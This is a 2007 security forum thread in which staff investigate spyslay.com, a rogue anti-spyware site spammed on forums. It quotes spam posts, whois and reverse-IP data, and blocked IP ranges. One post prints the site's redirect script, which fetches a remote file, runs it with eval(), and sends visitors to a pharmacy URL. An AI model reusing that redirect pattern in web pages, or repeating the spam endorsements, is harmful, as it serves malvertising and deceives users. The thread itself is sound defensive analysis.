Jump to content


Photo

SpySlay: New Rogue?


  • Please log in to reply
12 replies to this topic

#1 TeMerc

TeMerc

    Staff

  • Moderators
  • PipPipPipPipPipPip
  • 2,018 posts
  • Gender:Male
  • Location:Phx. AZ. USA
  • Interests:Formula 1 Auto Racing, Computer Security, Entertainment, Sci-Fi, SuperHeroes

Posted 20 September 2007 - 10:05 PM

I just had a user join up with a link to spyslayDOTcom/anti-spyware.

As soon as you click the page, you get re-directed to a System Doctor download!! A well known rogue.

BAD news!

For those with SiteAdvisor reviewr status, please add your comments or mimic mine:
http://www.siteadvisor.com/sites/spyslay.com/

Google search for 'spyslay' brings up most of the forums this guy is spamming:
http://www.google.com/search?q=spyslay&...amp;rlz=1I7ADBS

From one:

Posted by: genry-morgan Sep 20 2007, 03:23 AM
hello there!
i have got a online journal. i have recieved a lot of spam in my blog recently. could anyone tell me how to get antispam filter or something else to protect my blog? spamers send there much links. spamers are bothering me !
but i should say that once i got a advantage from them. they have sent me some links to someanti virus programme. so i decided to visit this site because my PC started to work slowly. i found there a proposition to download anti virus programme. after installing it, the program deleted all spyware from my computer!!! even such progams as Kaspersky and Nod32 could not find it!!!! i could not even think that there are so many spyware in my computer!!! you could click by one of this links. searching spyware on your PC is free!!! here are the link.
hxxp://www.spyslay.com/anti-spyware/
So that guys are not so useless, i think)))


hasta la vista

This one needs to go into the rogues gallery pronto.

Admins need to add spyslayDOTcom to ban filters

I've not done any research beyond a quick Google search, just spreading the word right now.
Tom Mercado
Product Support Team Lead

Posted Image

Follow us: Twitter, Become a fan: Facebook

#2 SwampDiner

SwampDiner

    True Member

  • Experts
  • PipPipPipPip
  • 419 posts
  • Location:The Internets

Posted 20 September 2007 - 10:49 PM

Added to RR hosts next release

#3 TeMerc

TeMerc

    Staff

  • Moderators
  • PipPipPipPipPipPip
  • 2,018 posts
  • Gender:Male
  • Location:Phx. AZ. USA
  • Interests:Formula 1 Auto Racing, Computer Security, Entertainment, Sci-Fi, SuperHeroes

Posted 20 September 2007 - 10:57 PM

Whois Info:

Contact: +49.3094413291

Domain Name: SPYSLAY.COM

Registrant:
TROYHORSE
Michel Dubua ()
Dionos 109
Buenos Aires
null,54652
AR
Tel. +526.54556254

Creation Date: 08-Jun-2007
Expiration Date: 08-Jun-2008

Domain servers in listed order:
ns2.spyslay.com
ns.spyslay.com

Administrative Contact:
TROYHORSE
Michel Dubua ()
Dionos 109
Buenos Aires
null,54652
AR
Tel. +526.54556254

Technical Contact:
TROYHORSE
Michel Dubua ()
Dionos 109
Buenos Aires
null,54652
AR
Tel. +526.54556254

Billing Contact:
TROYHORSE
Michel Dubua ()
Dionos 109
Buenos Aires
null,54652
AR
Tel. +526.54556254

Status:ACTIVE

Website Title: None given.
AboutUs: Wiki article on Spyslay.com
SEO Score: 61%
Terms: 62 (Unique: 47, Linked: 9)
Images: 3 (Alt tags missing: 3)
Links: 11 (Internal: 7, Outbound: 4)

Server Type: Apache/2.0.54 (Fedora)
IP Address: 87.118.103.24
IP Location - Berlin - Berlin - Keyweb Ag Ip Network
Response Code: 200
Blacklist Status: Clear
Domain Status: Registered And Active Website

ICANN Registrar: DIRECT INFORMATION PVT LTD D/B/A PUBLICDOMAINREGISTRY.COM
Created: 2007-06-08
Expires: 2008-06-08
Registrar Status: ok
Name Server: NS.SPYSLAY.COM
Name Server: NS2.SPYSLAY.COM
Whois Server: whois.publicdomainregistry.com


Tom Mercado
Product Support Team Lead

Posted Image

Follow us: Twitter, Become a fan: Facebook

#4 TeMerc

TeMerc

    Staff

  • Moderators
  • PipPipPipPipPipPip
  • 2,018 posts
  • Gender:Male
  • Location:Phx. AZ. USA
  • Interests:Formula 1 Auto Racing, Computer Security, Entertainment, Sci-Fi, SuperHeroes

Posted 21 September 2007 - 12:57 AM

From here:
http://www.bluetack.co.uk/forums/index.php...amp;#entry83425

I caught this guy on two of my forums and blocked him already.

"genry-morgan" (gooffy@spyslay.com) is coming from:

61.60.74.118 - GSN, Taiwan Government Service Network.:61.60.32.0-61.60.127.255
and
210.42.140.5 - Hubei Provincial Education Commission :210.42.140.0-210.42.141.255

Both ranges look like they belong in a couple of our lists, if not there already. ;]

My forums are now blocking:
61.60.74.*
210.42.140.*
210.42.141.*


Tom Mercado
Product Support Team Lead

Posted Image

Follow us: Twitter, Become a fan: Facebook

#5 nosirrah

nosirrah

    Forum Deity

  • Administrators
  • PipPipPipPipPipPip
  • 5,452 posts
  • Gender:Male
  • Location:Northampton, MA USA

Posted 21 September 2007 - 04:24 AM

http://spyslay.com/ reverse IP :

A-bts.com
Cigbuy.com
Djdot.com
Elite-pokers.com
I-drugsstore.com
Iqxn.com
Mailkon.com
Medpil.com
Medpil.us
Medqx.com
Ocxz.com
Oczx.com
Oilby.com
On-line-med.com
Payqx.com
Pokerscards.com
Qxlb.com
Rixrx.com
Sensecasino.com
Spymurder.com :P This page is winantivirus
Spyslay.com
Yoursmed.com
Bruce Harrison
Vice President of Research

Posted Image

Follow us: Twitter, Become a fan: Facebook

#6 JeanInMontana

JeanInMontana

    Delete this account!!

  • Honorary Members
  • PipPipPipPipPipPip
  • 3,867 posts
  • Interests:would love to see some honesty around this site.

Posted 21 September 2007 - 03:38 PM

Seems to be offline now.

#7 nosirrah

nosirrah

    Forum Deity

  • Administrators
  • PipPipPipPipPipPip
  • 5,452 posts
  • Gender:Male
  • Location:Northampton, MA USA

Posted 21 September 2007 - 07:30 PM

Seems to be offline now.


Add the /anti-spyware .

It is still live .
Bruce Harrison
Vice President of Research

Posted Image

Follow us: Twitter, Become a fan: Facebook

#8 nosirrah

nosirrah

    Forum Deity

  • Administrators
  • PipPipPipPipPipPip
  • 5,452 posts
  • Gender:Male
  • Location:Northampton, MA USA

Posted 21 September 2007 - 07:33 PM

You want a funny read ?

Do your best to capture the page http://spyslay.com/anti-spyware/ before it redirects .

I pasted the URL , hit enter and then stop the instant that page loads .
Bruce Harrison
Vice President of Research

Posted Image

Follow us: Twitter, Become a fan: Facebook

#9 nosirrah

nosirrah

    Forum Deity

  • Administrators
  • PipPipPipPipPipPip
  • 5,452 posts
  • Gender:Male
  • Location:Northampton, MA USA

Posted 21 September 2007 - 07:36 PM

His floppies tore deaf my jeans, helplessly clubbing them off me


These generated pages are always hilarious .
Bruce Harrison
Vice President of Research

Posted Image

Follow us: Twitter, Become a fan: Facebook

#10 JeanInMontana

JeanInMontana

    Delete this account!!

  • Honorary Members
  • PipPipPipPipPipPip
  • 3,867 posts
  • Interests:would love to see some honesty around this site.

Posted 22 September 2007 - 08:57 AM

It's like some cheap romance novel.Posted Image

Attached Files



#11 MysteryFCM

MysteryFCM

    Forum Deity

  • Moderators
  • PipPipPipPipPipPip
  • 5,389 posts
  • Gender:Male
  • Location:Tyneside, UK

Posted 04 October 2007 - 02:43 PM

You want a funny read ?

Do your best to capture the page http://spyslay.com/anti-spyware/ before it redirects .

I pasted the URL , hit enter and then stop the instant that page loads .


Just an addendum .. the re-dir is done using;

<script>
var key = "Anti-spyware"
function doLoad() {
  var req = window.XMLHttpRequest? 
	new XMLHttpRequest() : 
	new ActiveXObject("Microsoft.XMLHTTP");
  req.onreadystatechange = function() {
	if (req.readyState == 4) 
  {
  eval(req.responseText);
  }

  }
  req.open("GET", "rule.txt", true);
  req.send(null);
}
doLoad();
</script>

Which loads;

http://spyslay.com/anti-spyware/rule.txt

Which contains;

*****************************************************************
vURL Desktop Edition v0.1.6 Results
Source code for: http://spyslay.com/anti-spyware/rule.txt
Server IP: 87.118.103.24
Date: 04 October 2007
Time: 20:39:11:39
*****************************************************************
document.location="http://usarx.biz/su/in.cgi?13¶meter="+key;

Steven Burn

Malware Intelligence Analyst


staff.png

Follow us: Twitter, Become a fan: Facebook


#12 MysteryFCM

MysteryFCM

    Forum Deity

  • Moderators
  • PipPipPipPipPipPip
  • 5,389 posts
  • Gender:Male
  • Location:Tyneside, UK

Posted 05 October 2007 - 03:27 AM

Found courtesy of a spammer at the Screamer Radio forums;

spyware-protection.spyslay.com
7.5-anti-avg-plus-spyware.spyslay.com

whats up!! 
2 days ago i`ve noticed that my PC began working slowly! i decided to look for some antivirus program in network. i found realy good virus remover! here is it: 
 
[url=http://7.5-anti-avg-plus-spyware.spyslay.com/]anti spyware[/url] 
[url=http://spyware-protection.spyslay.com/]freespyware protection[/url] 
 
i think it will help you. 
chao

Posted by: callipso-ship
IP: 216.89.101.4

Steven Burn

Malware Intelligence Analyst


staff.png

Follow us: Twitter, Become a fan: Facebook


#13 nosirrah

nosirrah

    Forum Deity

  • Administrators
  • PipPipPipPipPipPip
  • 5,452 posts
  • Gender:Male
  • Location:Northampton, MA USA

Posted 05 October 2007 - 10:52 AM

[url="http://www.google.com/search?as_q=callipso...amp;safe=images"][url="http://www.google.com/search?as_q=callipso...amp;safe=images"]http://www.google.com/search?as_q=callipso...amp;safe=images[/url][/url]

Not as prolific as some other spammers .
Bruce Harrison
Vice President of Research

Posted Image

Follow us: Twitter, Become a fan: Facebook




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users